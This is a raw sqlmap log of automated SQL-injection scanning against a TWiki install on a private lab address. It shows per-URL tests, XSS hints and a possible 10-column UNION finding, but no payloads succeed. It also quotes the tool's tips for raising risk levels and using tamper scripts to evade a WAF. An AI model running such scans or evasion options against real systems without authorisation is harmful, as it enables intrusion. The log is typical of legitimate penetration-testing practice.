[20:18:35] [INFO] testing connection to the target URL
[20:18:35] [INFO] testing if the target URL is stable
[20:18:36] [INFO] target URL is stable
[20:18:36] [INFO] testing if GET parameter 'topicparent' is dynamic
[20:18:36] [WARNING] GET parameter 'topicparent' does not appear dynamic
[20:18:36] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable
[20:18:36] [INFO] testing for SQL injection on GET parameter 'topicparent'
[20:18:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:18:36] [WARNING] reflective value(s) found and filtering out
[20:18:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:18:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:18:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:18:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:18:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:18:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:18:40] [INFO] testing 'MySQL inline queries'
[20:18:40] [INFO] testing 'PostgreSQL inline queries'
[20:18:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:18:40] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:18:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:18:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:18:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:18:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:18:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:18:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:18:43] [INFO] testing 'Oracle AND time-based blind'
[20:18:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:18:43] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:18:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:18:55] [WARNING] GET parameter 'topicparent' is not injectable
[20:18:55] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 187:
GET http://192.168.1.113:80/twiki/bin/edit/Main/SupportGroup?topicparent=Main.TWikiGroups
do you want to test this URL? [Y/n/q]
> Y
[20:18:55] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Main/SupportGroup?topicparent=Main.TWikiGroups'
[20:18:55] [INFO] testing connection to the target URL
[20:18:55] [INFO] testing if the target URL is stable
[20:18:56] [INFO] target URL is stable
[20:18:56] [INFO] testing if GET parameter 'topicparent' is dynamic
[20:18:56] [WARNING] GET parameter 'topicparent' does not appear dynamic
[20:18:56] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable
[20:18:56] [INFO] testing for SQL injection on GET parameter 'topicparent'
[20:18:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:18:56] [WARNING] reflective value(s) found and filtering out
[20:18:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:18:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:18:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:18:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:18:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:18:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:18:59] [INFO] testing 'MySQL inline queries'
[20:18:59] [INFO] testing 'PostgreSQL inline queries'
[20:19:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:19:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:19:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:19:00] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:19:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:19:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:19:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:19:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:19:03] [INFO] testing 'Oracle AND time-based blind'
[20:19:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:19:03] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:19:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:19:14] [WARNING] GET parameter 'topicparent' is not injectable
[20:19:14] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 188:
GET http://192.168.1.113:80/twiki/bin/edit/Main/TWikiGroups?t=1441457837
do you want to test this URL? [Y/n/q]
> Y
[20:19:14] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Main/TWikiGroups?t=1441457837'
[20:19:14] [INFO] testing connection to the target URL
[20:19:15] [INFO] testing if the target URL is stable
[20:19:15] [INFO] target URL is stable
[20:19:15] [INFO] testing if GET parameter 't' is dynamic
[20:19:16] [WARNING] GET parameter 't' does not appear dynamic
[20:19:16] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[20:19:16] [INFO] testing for SQL injection on GET parameter 't'
[20:19:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:19:17] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:19:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:19:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:19:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:19:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:19:19] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:19:19] [INFO] testing 'MySQL inline queries'
[20:19:19] [INFO] testing 'PostgreSQL inline queries'
[20:19:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:19:19] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:19:20] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:19:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:19:21] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:19:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:19:21] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:19:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:19:22] [INFO] testing 'Oracle AND time-based blind'
[20:19:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:19:23] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:19:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:19:34] [WARNING] GET parameter 't' is not injectable
[20:19:34] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 189:
GET http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text&regex=on&search=TWiki *Groups[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[20:19:34] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text&regex=on&search=TWiki *Groups[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[20:19:34] [INFO] testing connection to the target URL
[20:19:34] [INFO] testing if the target URL is stable
[20:19:35] [INFO] target URL is stable
[20:19:35] [INFO] testing if URI parameter '#1*' is dynamic
[20:19:35] [WARNING] URI parameter '#1*' does not appear dynamic
[20:19:36] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[20:19:36] [INFO] testing for SQL injection on URI parameter '#1*'
[20:19:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:19:36] [WARNING] reflective value(s) found and filtering out
[20:19:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:19:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:19:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:19:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:19:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:19:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:19:39] [INFO] testing 'MySQL inline queries'
[20:19:39] [INFO] testing 'PostgreSQL inline queries'
[20:19:39] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:19:39] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:19:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:19:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:19:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:19:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:19:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:19:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:19:43] [INFO] testing 'Oracle AND time-based blind'
[20:19:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:19:43] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:19:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:19:55] [WARNING] URI parameter '#1*' is not injectable
[20:19:55] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 190:
GET http://192.168.1.113:80/twiki/bin/view/Main/TWikiGroups?skin=print
do you want to test this URL? [Y/n/q]
> Y
[20:19:55] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiGroups?skin=print'
[20:19:55] [INFO] testing connection to the target URL
[20:19:55] [INFO] testing if the target URL is stable
[20:19:56] [INFO] target URL is stable
[20:19:56] [INFO] testing if GET parameter 'skin' is dynamic
[20:19:56] [INFO] confirming that GET parameter 'skin' is dynamic
[20:19:56] [INFO] GET parameter 'skin' is dynamic
[20:19:56] [INFO] heuristics detected web page charset 'ascii'
[20:19:56] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[20:19:56] [INFO] testing for SQL injection on GET parameter 'skin'
[20:19:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:19:56] [WARNING] reflective value(s) found and filtering out
[20:19:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:19:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:19:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:19:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:19:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:19:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:20:00] [INFO] testing 'MySQL inline queries'
[20:20:00] [INFO] testing 'PostgreSQL inline queries'
[20:20:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:20:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:20:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:20:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:20:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:20:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:20:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:20:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:20:03] [INFO] testing 'Oracle AND time-based blind'
[20:20:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:20:03] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:20:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:20:14] [WARNING] GET parameter 'skin' is not injectable
[20:20:14] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 191:
GET http://192.168.1.113:80/twiki/bin/rdiff/Main/TWikiGroups?rev1=1.4&rev2=1.3
do you want to test this URL? [Y/n/q]
> Y
[20:20:14] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/Main/TWikiGroups?rev1=1.4&rev2=1.3'
[20:20:14] [INFO] testing connection to the target URL
[20:20:14] [INFO] testing if the target URL is stable
[20:20:15] [INFO] target URL is stable
[20:20:15] [INFO] testing if GET parameter 'rev1' is dynamic
[20:20:15] [WARNING] GET parameter 'rev1' does not appear dynamic
[20:20:15] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[20:20:15] [INFO] testing for SQL injection on GET parameter 'rev1'
[20:20:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:20:16] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:20:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:20:17] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:20:18] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:20:18] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:20:19] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:20:19] [INFO] testing 'MySQL inline queries'
[20:20:19] [INFO] testing 'PostgreSQL inline queries'
[20:20:19] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:20:19] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:20:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:20:20] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:20:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:20:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:20:21] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:20:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:20:22] [INFO] testing 'Oracle AND time-based blind'
[20:20:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:20:23] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:20:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:20:34] [WARNING] GET parameter 'rev1' is not injectable
[20:20:34] [INFO] testing if GET parameter 'rev2' is dynamic
[20:20:34] [WARNING] GET parameter 'rev2' does not appear dynamic
[20:20:35] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[20:20:35] [INFO] testing for SQL injection on GET parameter 'rev2'
[20:20:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:20:36] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:20:36] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:20:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:20:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:20:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:20:38] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:20:38] [INFO] testing 'MySQL inline queries'
[20:20:38] [INFO] testing 'PostgreSQL inline queries'
[20:20:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:20:39] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:20:39] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:20:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:20:40] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:20:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:20:41] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:20:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:20:42] [INFO] testing 'Oracle AND time-based blind'
[20:20:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:20:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:20:54] [WARNING] GET parameter 'rev2' is not injectable
[20:20:54] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 192:
GET http://192.168.1.113:80/twiki/bin/view/Main/TWikiGroups?rev=1.3
do you want to test this URL? [Y/n/q]
> Y
[20:20:54] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiGroups?rev=1.3'
[20:20:54] [INFO] testing connection to the target URL
[20:20:55] [INFO] testing if the target URL is stable
[20:20:56] [INFO] target URL is stable
[20:20:56] [INFO] testing if GET parameter 'rev' is dynamic
[20:20:56] [INFO] confirming that GET parameter 'rev' is dynamic
[20:20:56] [INFO] GET parameter 'rev' is dynamic
[20:20:56] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[20:20:56] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[20:20:56] [INFO] testing for SQL injection on GET parameter 'rev'
[20:20:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:20:56] [WARNING] reflective value(s) found and filtering out
[20:20:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:20:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:20:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:20:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:20:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:21:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:21:00] [INFO] testing 'MySQL inline queries'
[20:21:00] [INFO] testing 'PostgreSQL inline queries'
[20:21:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:21:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:21:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:21:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:21:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:21:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:21:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:21:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:21:03] [INFO] testing 'Oracle AND time-based blind'
[20:21:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:21:04] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:21:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:21:16] [WARNING] GET parameter 'rev' is not injectable
[20:21:16] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[20:21:16] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/TWikiGroups?rev1=1.3&rev2=1.2'
[20:21:16] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/TWikiGroups?rev=1.2'
URL 193:
GET http://192.168.1.113:80/twiki/bin/oops/Main/TWikiGroups?template=oopsmore&param1=1.4&param2=1.4
do you want to test this URL? [Y/n/q]
> Y
[20:21:16] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/Main/TWikiGroups?template=oopsmore&param1=1.4&param2=1.4'
[20:21:16] [INFO] testing connection to the target URL
[20:21:16] [INFO] testing if the target URL is stable
[20:21:17] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[20:21:17] [INFO] testing if GET parameter 'template' is dynamic
[20:21:17] [INFO] confirming that GET parameter 'template' is dynamic
[20:21:17] [INFO] GET parameter 'template' is dynamic
[20:21:17] [INFO] heuristics detected web page charset 'ascii'
[20:21:17] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[20:21:17] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[20:21:17] [INFO] testing for SQL injection on GET parameter 'template'
[20:21:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:21:17] [WARNING] reflective value(s) found and filtering out
[20:21:18] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:21:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:21:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:21:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:21:19] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:21:20] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:21:20] [INFO] testing 'MySQL inline queries'
[20:21:20] [INFO] testing 'PostgreSQL inline queries'
[20:21:20] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:21:20] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:21:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:21:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:21:21] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:21:22] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:21:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:21:23] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:21:23] [INFO] testing 'Oracle AND time-based blind'
[20:21:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:21:23] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:21:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:21:32] [WARNING] GET parameter 'template' is not injectable
[20:21:32] [INFO] testing if GET parameter 'param1' is dynamic
[20:21:32] [WARNING] GET parameter 'param1' does not appear dynamic
[20:21:32] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[20:21:33] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[20:21:33] [INFO] testing for SQL injection on GET parameter 'param1'
[20:21:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:21:34] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:21:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:21:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:21:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:21:36] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:21:36] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:21:36] [INFO] testing 'MySQL inline queries'
[20:21:36] [INFO] testing 'PostgreSQL inline queries'
[20:21:36] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:21:37] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:21:37] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:21:37] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:21:38] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:21:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:21:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:21:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:21:40] [INFO] testing 'Oracle AND time-based blind'
[20:21:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:21:47] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:21:53] [WARNING] GET parameter 'param1' is not injectable
[20:21:53] [INFO] testing if GET parameter 'param2' is dynamic
[20:21:53] [WARNING] GET parameter 'param2' does not appear dynamic
[20:21:53] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[20:21:53] [INFO] testing for SQL injection on GET parameter 'param2'
[20:21:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:21:54] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:21:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:21:55] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:21:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:21:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:21:57] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:21:57] [INFO] testing 'MySQL inline queries'
[20:21:57] [INFO] testing 'PostgreSQL inline queries'
[20:21:57] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:21:57] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:21:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:21:58] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:21:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:21:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:21:59] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:22:00] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:22:00] [INFO] testing 'Oracle AND time-based blind'
[20:22:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:22:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:22:10] [INFO] target URL appears to be UNION injectable with 10 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[20:22:13] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[20:22:17] [WARNING] GET parameter 'param2' is not injectable
[20:22:17] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 194:
